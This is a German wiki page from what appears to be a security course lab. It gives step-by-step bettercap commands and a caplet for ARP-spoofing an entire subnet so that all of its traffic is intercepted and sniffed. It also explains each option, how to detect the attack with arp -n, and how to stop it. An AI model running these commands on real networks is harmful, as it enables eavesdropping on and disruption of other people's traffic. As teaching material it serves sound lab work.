Arpspoofing mit Bettercap Kompletter Verkehr
Version vom 20. August 2026, 14:26 Uhr von Thomas.will (Diskussion | Beiträge) (Die Seite wurde neu angelegt: „=Bettercap: Kompletter Verkehr im Segment= =Szenario= *INTERFACE=eth0 *Netz: 10.0.10.0/24 Ohne Einschraenkung auf einzelne Ziele vergiftet bettercap alle err…“)
Bettercap: Kompletter Verkehr im Segment
Szenario
- INTERFACE=eth0
- Netz: 10.0.10.0/24
Ohne Einschraenkung auf einzelne Ziele vergiftet bettercap alle erreichbaren Hosts. Der gesamte Verkehr des Segments laeuft dann ueber den Angreifer - nicht nur die Strecke eines einzelnen Opfers.
Benoetigtes Paket
- apt-get install bettercap
Angriff auf dem Angreifer
- bettercap -iface eth0
- Im bettercap-Prompt
- set arp.spoof.targets 10.0.10.0/24
- set arp.spoof.internal true
- set arp.spoof.fullduplex true
- net.probe on
- arp.spoof on
- net.sniff on
Optionen
-iface eth0 = Interface arp.spoof.targets = ganzes Netz statt einzelner Hosts arp.spoof.internal true = auch Host-zu-Host im LAN vergiften, nicht nur Richtung Gateway arp.spoof.fullduplex = beide Richtungen vergiften net.probe on = ARP-Cache vorab fuellen, damit alle MACs bekannt sind arp.spoof on = ARP-Spoofing starten net.sniff on = Mitschnitt starten
- Das Gegenstueck zu ettercaps /// /// ist hier arp.spoof.targets 10.0.10.0/24
- zusammen mit arp.spoof.internal true. Erst das ganze Netz als Ziel UND internal
- true zusammen ergeben "alle gegen alle" - internal allein oder das Netz allein
- wuerden nur einen Teil erfassen.
Warnung
- Das ist der lauteste und riskanteste MITM ueberhaupt
- Der Angreifer muss den GESAMTEN Verkehr des Segments weiterleiten. Bei vielen
- Hosts wird die Angreifer-Maschine schnell zum Flaschenhals - Pakete gehen
- verloren, Verbindungen brechen ab, das ganze Netz wird langsam.
- Der Angriff ist im Netz sofort auffaellig (ARP-Sturm, doppelte MACs ueberall).
- Im Kurslabor unbedingt darauf achten, dass nur die eigene Uebungsgruppe
- betroffen ist und nicht die Nachbargruppen mit im selben Segment haengen.
- Fuer gezieltes Abhoeren ist die Variante mit benannten Zielen (CLIENT/GATEWAY
- oder Host-zu-Host) fast immer die bessere Wahl. Das ganze Netz zu spoofen ist
- die Demo fuer "so sieht es aus, wenn jemand mit dem Vorschlaghammer kommt".
Als Caplet (reproduzierbar)
- Das Caplet ist nichts weiter als die obigen Befehle in eine Datei geschrieben,
- damit man sie nicht jedes Mal von Hand tippt.
- vim seclab-all.cap:
net.probe on set arp.spoof.targets 10.0.10.0/24 set arp.spoof.internal true set arp.spoof.fullduplex true arp.spoof on net.sniff on
- Start
- bettercap -iface eth0 -caplet seclab-all.cap
Nachweis auf einem beliebigen Host
- Mehrere IPs zeigen ploetzlich dieselbe MAC - die des Angreifers
- arp -n
10.0.10.1 ether <MAC-der-kali-innen> C eth0 10.0.10.103 ether <MAC-der-kali-innen> C eth0 10.0.10.105 ether <MAC-der-kali-innen> C eth0
- Wenn quer durch die Tabelle dieselbe MAC auftaucht, laeuft ein Segment-weiter MITM.
Angriff beenden
- Im bettercap-Prompt
- arp.spoof off
- q
- arp.spoof off schickt korrekte ARP-Antworten (re-ARP) an alle betroffenen Hosts,
- damit die ARP-Caches wieder stimmen und das Netz normal weiterarbeitet.